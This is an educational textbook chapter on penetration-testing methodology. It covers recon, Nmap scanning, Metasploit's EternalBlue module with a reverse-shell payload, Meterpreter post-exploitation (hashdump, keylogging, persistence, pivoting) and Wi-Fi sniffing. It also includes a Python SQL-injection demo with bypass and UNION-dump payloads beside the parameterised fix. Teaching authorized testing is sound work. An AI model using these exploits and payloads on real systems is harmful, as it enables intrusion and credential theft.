Chapter 9: Ethical Hacking & Penetration Testing Basics
Ethical Hacking & Penetration Testing Basics. This is the exciting "hands-on offensive" chapter, where we switch from defense to simulating attacks ethically (with permission!) to find weaknesses before real attackers do. In January 2026 (right here in Airoli, Maharashtra, with the sun out and maybe some chai nearby ☕), ethical hacking is booming: India's pentesting market is growing fast, companies need it for DPDP Act compliance, and tooling such as Kali keeps adding new capabilities (including better ARM support).
Important reminder upfront: Everything here is for authorized testing only. Never test without written permission and agreed Rules of Engagement (RoE): scope, time window, allowed techniques, and an emergency contact. Unauthorized testing is a criminal offence (in India, the IT Act 2000 as amended in 2008, notably Sections 43 and 66). We're learning to be white-hat pros, not black-hats.
The standard ethical hacking/penetration testing methodology follows these phases (based on PTES, OSSTMM, NIST SP 800-115, and the CEH/OffSec curricula):
- Planning & Reconnaissance (Information Gathering / Footprinting)
- Scanning & Enumeration
- Gaining Access (Exploitation)
- Maintaining Access (Post-Exploitation)
- Covering Tracks (in an authorized test this usually means cleaning up your own artifacts and reporting them, not hiding from the client's SOC)
- Reporting
Many sources combine or split them slightly, but this is the classic flow. In 2026, AI helps automate parts (recon, scanning), but human creativity is still king for chaining exploits.
Ethical Hacking Phases (Reconnaissance → Reporting)
Phase 1: Reconnaissance / Footprinting Goal: Gather as much intel as possible without touching the target (passive) or with minimal interaction (active). This builds the attack surface map.
- Passive Recon — No direct contact (no packets to the target's own infrastructure; you only query third parties).
- OSINT (Open Source Intelligence): WHOIS domain lookup, Shodan.io searches, LinkedIn/employee social media, job postings (tech-stack leaks), certificate transparency logs (crt.sh), subdomain enumeration (sublist3r, amass), lookalike/typosquat domain detection (dnstwist).
- Google Dorking (advanced search operators): Example: site:target.com filetype:pdf "confidential" → finds leaked docs. inurl:admin intitle:"login" site:gov.in → admin panels on Indian government domains (wildcards such as site:*.in are not reliably honoured, so pick a concrete suffix). The old cache: operator was retired by Google in 2024; use the Wayback Machine (web.archive.org) to see old copies of pages with forgotten info.
- Active Recon — Interact lightly (e.g., ping sweep, DNS queries). Example: dig target.com MX → mail servers; dig target.com NS, then dig axfr target.com @ns1.target.com → tests for a misconfigured zone transfer that hands you every record in the zone. nslookup does the same job on Windows.
Illustrative scenario (a Mumbai fintech client): recon finds a public GitHub repo with API keys in a committed .env file (found by searching GitHub code for .env files mentioning the company), employee LinkedIn profiles showing AWS usage, and Shodan revealing RDP (3389/tcp) exposed on public IPs. None of this touches the client's systems, yet it already yields candidate credentials, a cloud target and an entry point.
Phase 2: Scanning & Enumeration Now interact directly to map live hosts, open ports, services, versions, users, shares.
- Scanning — Find live hosts + open ports/services. Tool: Nmap (Network Mapper), the Swiss army knife. Examples:
- nmap -sn 192.168.1.0/24 → ping sweep (live hosts only, no port scan).
- sudo nmap -sS -p- -A target.com → SYN ("half-open") scan of all 65535 ports with OS/service/version detection and default scripts. -sS needs root for raw sockets; without sudo nmap silently falls back to the full-connect -sT scan, which completes the handshake and is logged by the target. -p- is slow, so start with --top-ports 1000 and -T4 on large ranges.
- nmap --script vuln target.com → runs the NSE "vuln" script category (two dashes, not an en dash). Some of these scripts can crash fragile services, so confirm they are within scope.
- Enumeration — Dig deeper: users, shares, versions to match against exploits. Examples:
- SMB: enum4linux -a target or smbclient -L //target -N to list shares/users over a null session.
- SNMP: snmpwalk -v2c -c public target for config leaks when the default community string is still set.
- Web: Dirb/Dirbuster/Gobuster (gobuster dir -u http://target -w wordlist.txt) for hidden dirs.
- Vulnerability Scanners: OpenVAS/Greenbone (free), Nessus (Essentials tier is free for up to 16 IPs), Nikto for web servers, Nuclei (fast, template-based). Treat scanner output as leads to verify by hand, not as confirmed findings.
Practical notes: everything in Phase 2 sends packets to the target, so the RoE must already be signed. Scan from an IP the client has allow-listed, keep a timestamped log of every command (the client's SOC will ask), and check nmap --version and the release notes rather than assuming a feature from a blog post is in your build; newer releases keep improving IPv6 scanning and the NSE script library.
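As an added example (not from the chapter), here is what a connect scan plus banner grab looks like in plain Python, i.e. what nmap -sT and the first step of -sV do under the hood. To keep it runnable offline, the script starts a constructed fake service on 127.0.0.1 and scans that; the banners are made up in the style of the OpenSSH/vsFTPd services on Metasploitable, not captured from any real host, and the signature table is a toy version of nmap's service probes.

```python
"""Added example: TCP connect scan + banner grab + version fingerprint.
Everything here runs against a constructed loopback service, so it is safe
to execute anywhere; point connect_scan() at a real host only with a signed RoE.
"""
import re
import socket
import threading

# Constructed banners in the format real services emit (not captured traffic).
FAKE_SSH_BANNER = b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n"
FAKE_FTP_BANNER = b"220 (vsFTPd 2.3.4)\r\n"

# Toy signature table: regex over the banner -> service name; group 1 = version.
SIGNATURES = [
    (re.compile(r"^SSH-(?:2\.0|1\.99)-(\S+)"), "ssh"),
    (re.compile(r"^220 \((vsFTPd [\d.]+)\)"), "ftp"),
    (re.compile(r"^220 \S+ ESMTP (\S+)"), "smtp"),
]


def start_fake_service(banner):
    """Listen on an ephemeral loopback port and send `banner` to every client.

    Stand-in for a real target so the scanner can be exercised offline.
    Returns (port, listening_socket); close the socket to stop the thread.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listening socket closed -> stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port, srv


def free_closed_port():
    """Pick a port that is (almost certainly) closed: bind, read it back, release."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host, ports, timeout=0.5):
    """TCP connect scan: a full three-way handshake per port (no raw sockets, no root)."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means connected -> open
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, timeout=1.0):
    """Connect and read whatever the service volunteers before we send anything."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            return s.recv(512).decode("ascii", errors="replace").strip()
        except socket.timeout:
            return ""              # silent services (e.g. HTTP) need a probe instead


def fingerprint(banner):
    """Map a banner to (service, version); ('unknown', '') if nothing matches."""
    for pattern, service in SIGNATURES:
        m = pattern.match(banner)
        if m:
            return service, m.group(1)
    return "unknown", ""


def enumerate_host(host, ports):
    """Scan, then banner-grab and fingerprint every open port: {port: (service, version)}."""
    return {p: fingerprint(grab_banner(host, p)) for p in connect_scan(host, ports)}


if __name__ == "__main__":
    ssh_port, ssh_srv = start_fake_service(FAKE_SSH_BANNER)
    ftp_port, ftp_srv = start_fake_service(FAKE_FTP_BANNER)
    targets = [ssh_port, ftp_port, free_closed_port()]
    for port, (svc, ver) in enumerate_host("127.0.0.1", targets).items():
        print(f"{port}/tcp open  {svc:<8} {ver}")
    ssh_srv.close()
    ftp_srv.close()
```

The version string is the payoff: "vsFTPd 2.3.4" is exactly the kind of result you feed into searchsploit or msfconsole's search in Phase 3. Real nmap also sends protocol-specific probes to services that stay silent until spoken to, which this toy skips.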
Phase 3: Exploitation Basics Use discovered vulns to gain access.
- Basics: Match the discovered version/vuln (e.g., an outdated Apache Struts release with a known CVE) to exploit code, and confirm the service really is vulnerable before firing anything that could crash it.
- Metasploit Framework — Exploit database + payload delivery. Example workflow:
- msfconsole
- search eternalblue → finds the module for MS17-010 (the SMBv1 bug WannaCry used).
- use exploit/windows/smb/ms17_010_eternalblue
- set RHOSTS <target IP>; set LHOST <your IP> (where the reverse shell calls back); optionally set PAYLOAD windows/x64/meterpreter/reverse_tcp.
- check → the module's non-destructive probe reports whether the host looks vulnerable; exploit → Meterpreter session if it is. This exploit can blue-screen an unpatched host, so only run it where the RoE accepts that risk.
- Other: Manual exploits and specialised tools (e.g., sqlmap for SQLi: sqlmap -u "http://target/login" --data "user=a&pass=b" --dbs, or --forms to let sqlmap parse the form itself; a bare -u on a login URL with no POST data never tests the form fields).
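An added example (not from the chapter) of the login-form SQL injection that sqlmap automates, against an in-memory SQLite database, with the fix beside it. The users table, names and passwords are constructed test data; storing passwords in plaintext is itself a finding and is kept here only so the UNION dump has something visible to steal.

```python
"""Added example: authentication bypass and UNION-based dump via SQL injection,
and the parameterised query that closes the hole. Target data is constructed.
"""
import sqlite3


def make_db():
    """Constructed target: two users, passwords stored in plaintext (a finding on its own)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "S3cr3t!", "admin"), ("ravi", "chai123", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The bug: user input is concatenated straight into the SQL text."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """The fix: a prepared statement; values travel separately from the SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Payloads a tester (or sqlmap's boolean/union techniques) would try in the username field.
AUTH_BYPASS = "admin' -- "   # closes the string, comments out the password check
UNION_DUMP = "' UNION SELECT username, password FROM users -- "   # same column count (2)


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, AUTH_BYPASS, "wrong"))
    print("dump:  ", login_vulnerable(db, UNION_DUMP, "wrong"))
    print("fixed: ", login_safe(db, AUTH_BYPASS, "wrong"))
```

With the vulnerable function the bypass payload logs in as admin without the password, and the UNION payload returns every username/password pair, which is the "DB dump" the sample report entry later in this chapter describes. The safe version returns nothing for both payloads because the quote and the comment are treated as data, not SQL.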
Phase 4: Post-Exploitation Once in, what next? Maintain access, pivot, gather evidence and assess impact, all within the agreed scope.
- Meterpreter (Metasploit payload): getuid (who am I?), getsystem (attempt privilege escalation), hashdump (dump local password hashes; needs SYSTEM), migrate <pid> (move into a stabler process such as explorer.exe), screenshot, keyscan_start/keyscan_dump (keylogging), upload/download, portfwd for port forwarding.
- Persistence: only if the RoE allows it, and always recorded for cleanup: a scheduled task, a registry Run key, or in an AD engagement a Golden Ticket (a forged Kerberos TGT built from the krbtgt hash).
- Pivoting: Use the compromised host as a jump box. In Metasploit: run autoroute -s 10.10.10.0/24 from the Meterpreter session (or route add 10.10.10.0 255.255.255.0 <session id> in msfconsole), then scan the internal subnet through it; the auxiliary/server/socks_proxy module plus proxychains lets other tools ride the same tunnel.
- Data exfil: prove impact with a marker file or a redacted sample, not by pulling real customer data, and log exactly what you took so the client can verify deletion.
Phase 5: Reporting (the most important phase for an ethical test!) Document everything: scope, methodology, findings with CVSS scores, proof-of-concept screenshots, risk level, remediation steps, plus what you left behind (accounts, files, persistence) so the client can clean up. Structure: executive summary → technical details → risk matrix → recommendations. Example: "Critical (CVSS 9.8): SQL injection in the login form allowed authentication bypass and a full database dump (proof attached). Remediate: use prepared statements/parameterised queries, validate input, and hash stored passwords."
Tools: Kali Linux, Metasploit, Burp Suite, Wireshark
- Kali Linux Debian-based, rolling-release pentest distro with quarterly snapshots named YYYY.N (check kali.org for the current one rather than trusting a version number quoted in a blog post). Pre-installed 600+ tools, ZSH as the default shell (since 2020.4), NetHunter for Android, Win-KeX for running the Kali desktop under WSL, and ARM images for boards such as the Raspberry Pi. Use: boot a live USB or a VM (VirtualBox/VMware), or install to disk, then keep it current with sudo apt update && sudo apt full-upgrade -y.
- Metasploit Framework (Rapid7, open-source) Exploit framework. 2025/2026 updates: 139+ new modules, better AD relaying, ARM64 Meterpreter, exploits for SharePoint RCE, Oracle EBS, etc.; confirm what your build has with msfconsole --version and the release notes. Use: msfconsole → search/use/set/check/exploit.
- Burp Suite (PortSwigger) Web app pentest tool. Community (free) vs Pro (paid, adds the active scanner). Features: Proxy (intercept and modify requests between browser and app), Repeater (resend one request with edits), Intruder (fuzzing/brute-force; throttled in Community), Scanner (Pro), extensions from the BApp Store. Good for APIs as well as classic web apps. Example: intercept the login POST → change the username to admin' -- → compare the response with a normal failed login to spot an SQLi authentication bypass.
- Wireshark Packet analyzer (sniffer). Use: capture on an interface, then narrow down with display filters such as tcp.port == 80 or http.request.method == "POST" (capture filters use a different BPF syntax, e.g. tcp port 80). Example: Follow TCP Stream on a plaintext HTTP login to read the credentials. On Wi-Fi, put the adapter in monitor mode (airmon-ng start wlan0) to capture frames you are not a party to; WPA2-PSK traffic only becomes readable if you supply the passphrase and have captured the client's 4-way handshake (Edit → Preferences → Protocols → IEEE 802.11 → Decryption keys). Sniffing a network you do not own or have permission to test is just as illegal as everything else here.
Quick home lab tip (Airoli style): Install Kali in VirtualBox alongside Metasploitable 2 or 3 (deliberately vulnerable VMs) and a Windows XP/7 VM, and put all of them on a host-only or internal network so the vulnerable boxes never face the internet or your home Wi-Fi. Practice safely!
That’s Chapter 9—your first taste of offensive security! Feels empowering, right?
